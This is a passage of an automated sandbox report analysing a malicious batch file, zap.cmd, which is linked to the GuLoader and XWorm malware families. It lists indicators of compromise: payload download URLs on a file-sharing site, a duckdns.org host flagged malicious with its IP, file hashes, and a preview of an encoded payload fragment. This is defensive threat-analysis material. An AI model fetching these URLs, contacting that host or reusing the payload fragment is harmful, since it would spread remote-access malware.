                      http://crl.micropowershell.exe, 00000005.00000002.2184760858.00000000077FA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBewab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n3.sendspace.com/I6wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2176975664.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2181785367.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://fs13n3.sendspace.compowershell.exe, 00000002.00000002.2441978527.000002045CC36000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n3.sendspace.compowershell.exe, 00000002.00000002.2441978527.000002045CC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2441978527.000002045B2E4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2441978527.000002045AE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2178140808.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2921644464.0000000025F31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/5m5a1uXRulpowershell.exe, 00000005.00000002.2178140808.0000000004D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/wyg3h5j83wab.exe, 0000000A.00000003.2151778284.000000000A57F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      69.31.136.17
                      		fs03n3.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse
                      12.202.180.134
                      		xgmn934.duckdns.orgUnited States
                      		22983FISERV-INCUStrue
                      172.67.170.105
                      		www.sendspace.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      69.31.136.57
                      		fs13n3.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446779
                      Start date and time:2024-05-23 21:04:23 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 12s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:zap.cmd
                      Detection:MAL
                      Classification:mal100.troj.evad.winCMD@13/9@4/4
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 90%
                      • Number of executed functions: 63
                      • Number of non-executed functions: 17
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7488 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7744 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: zap.cmd

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:05:13API Interceptor7153x Sleep call for process: powershell.exe modified
                      15:06:11API Interceptor77409x Sleep call for process: wab.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      69.31.136.17xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                        new.cmdGet hashmaliciousGuLoaderBrowse
                          las.cmdGet hashmaliciousGuLoaderBrowse
                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                  update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                    file.vbsGet hashmaliciousGuLoaderBrowse
                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                        windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                          12.202.180.134xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                            new.cmdGet hashmaliciousGuLoaderBrowse
                                              las.cmdGet hashmaliciousGuLoaderBrowse
                                                kam.cmdGet hashmaliciousUnknownBrowse
                                                  sample.cmdGet hashmaliciousUnknownBrowse
                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                      xff.cmdGet hashmaliciousUnknownBrowse
                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                          las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                            las.cmdGet hashmaliciousUnknownBrowse
                                                              172.67.170.105new.cmdGet hashmaliciousGuLoaderBrowse
                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                      las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                          file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                            time.vbsGet hashmaliciousGuLoaderBrowse
                                                                              file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                69.31.136.57xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                      las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                          kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                            windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                              file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                update.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                  time.vbsGet hashmaliciousGuLoaderBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.sendspace.comxff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    fs03n3.sendspace.comlas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.17
                                                                                                    file.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.17
                                                                                                    UHNMA702NQ.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 69.31.136.17
                                                                                                    xgmn934.duckdns.orgnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134
                                                                                                    update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134
                                                                                                    fs13n3.sendspace.comnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.57
                                                                                                    1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 69.31.136.57

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSxff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.46.101
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                                                                                    • 104.18.72.113
                                                                                                    https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                                                                    • 162.247.243.29
                                                                                                    GTT-BACKBONEGTTDExff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    GTT-BACKBONEGTTDExff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    FISERV-INCUSupdate.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    kam.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    sample.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134
                                                                                                    xff.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0exff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    filePY.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.57
                                                                                                    37f463bf4616ecd445d4a1937da06e19xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17
                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                    • 172.67.170.105
                                                                                                    • 69.31.136.17

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):11608
                                                                                                    Entropy (8bit):4.8908305915084105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:@...e................................................@..........

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t0oza4b.equ.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wkmyrx3.t4j.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrriaff2.3le.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upabvupi.4vk.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Roaming\Belejringstilstandenes.Unj

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476228
                                                                                                    Entropy (8bit):5.950759112183201
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:NLbnN895PyzLhKpXl30Sa1RYb393bpeA3RYvh:NL5YbpV3j91es+
                                                                                                    MD5:61708C02A92801DEA7267DAF2300D321
                                                                                                    SHA1:5414B3AED956E83FB5F196F44CE5888DCFD6E4A9
                                                                                                    SHA-256:3B1E99B27D0AC212EE8597AA77C4F3D242A198C06CBF5FC536B0E635A9F203F7
                                                                                                    SHA-512:5787BC03913EAC9E7082657D2420E66ED0E7A481E75CCCAD7F077EE347146CCCE06534ED8F7E5105895F9C4E3E011F74FDCD03088EEE5736713BC09BB9C3FE85
                                                                                                    Malicious:false
                                                                                                    Preview:cQGb6wJXeLuGYQ4A6wLCEnEBmwNcJARxAZtxAZu5r6rD93EBm3EBm4HxNfe4SHEBm3EBm4Hxml17v3EBm3EBm3EBm3EBm7qNmuz16wIuXusC2WHrAu5bcQGbMcpxAZvrAkLXiRQLcQGbcQGb0eJxAZtxAZuDwQTrAlot6wKxmIH5OiHMBXzMcQGb6wL0KotEJARxAZtxAZuJw3EBm3EBm4HD6wq5AOsCD7lxAZu6W/V0DOsC76RxAZuB6rQMhg/rAmyjcQGbgfKn6O786wJcBnEBm3EBm+sC4hpxAZvrApDviwwQcQGb6wLqeYkME3EBm3EBm0JxAZvrAnxogfoEBgUAddZxAZvrAjTTiVwkDOsCOB9xAZuB7QADAADrAkPN6wK3xItUJAjrAmGFcQGbi3wkBHEBm+sCkmuJ63EBm3EBm4HDnAAAAOsCADHrAifqU3EBm3EBm2pA6wIcXHEBm4nrcQGbcQGbx4MAAQAAAJDdBXEBm+sCf2KBwwABAABxAZtxAZtTcQGb6wLbq4nr6wJSiHEBm4m7BAEAAOsCW6JxAZuBwwQBAABxAZtxAZtTcQGbcQGbav/rAs7q6wIXI4PCBXEBm3EBmzH26wLbIHEBmzHJcQGb6wJCO4sa6wIUT+sC5zJBcQGbcQGbORwKdfRxAZvrAh+fRusCIm7rAhy4gHwK+7h13esCG2BxAZuLRAr86wIka3EBmynw6wK0eOsCuMf/0nEBm+sCBoO6BAYFAOsC6t9xAZsxwHEBm+sCZ5WLfCQMcQGb6wLAO4E0B084fFZxAZtxAZuDwARxAZtxAZs50HXm6wIfSnEBm4n7cQGb6wIcGv/XcQGbcQGbxt31y0PHg6n0dDVWg7mPDS7wuNe8BUHWArmPfFlwOX+Ts+FasMeDA8bdLe+cRKBOzsHGVk84c9Jty3hWFoE762vpipI9uY3Zts8X174zzqsuXouQgKz9lxoxrXIpz74Aav84W08/bDOkvInXIzV8

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6221
                                                                                                    Entropy (8bit):3.7455257191721056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bvgYWm33CxH2NkvhkvCCt6ri7J8Hpri7JzHb:bvnWmyWZ6uQud
                                                                                                    MD5:19045132C639EFE199ACD272F2D3A202
                                                                                                    SHA1:5151CB3B6D357A8015E9E543E62ACCF2BBABD404
                                                                                                    SHA-256:701A66A2F891A84FB5DB642E6DFA32D77225B30B13475FDCF2390ED5E7B55233
                                                                                                    SHA-512:6D9F8759FE163C94F3BC53E73AF126D266C3DA929400FBDE1067D4A55CAEA1003C5E15A9A9AAB50941A453B4416367E3B07DC08206AED1F5B104F5389BE2F39D
                                                                                                    Malicious:false
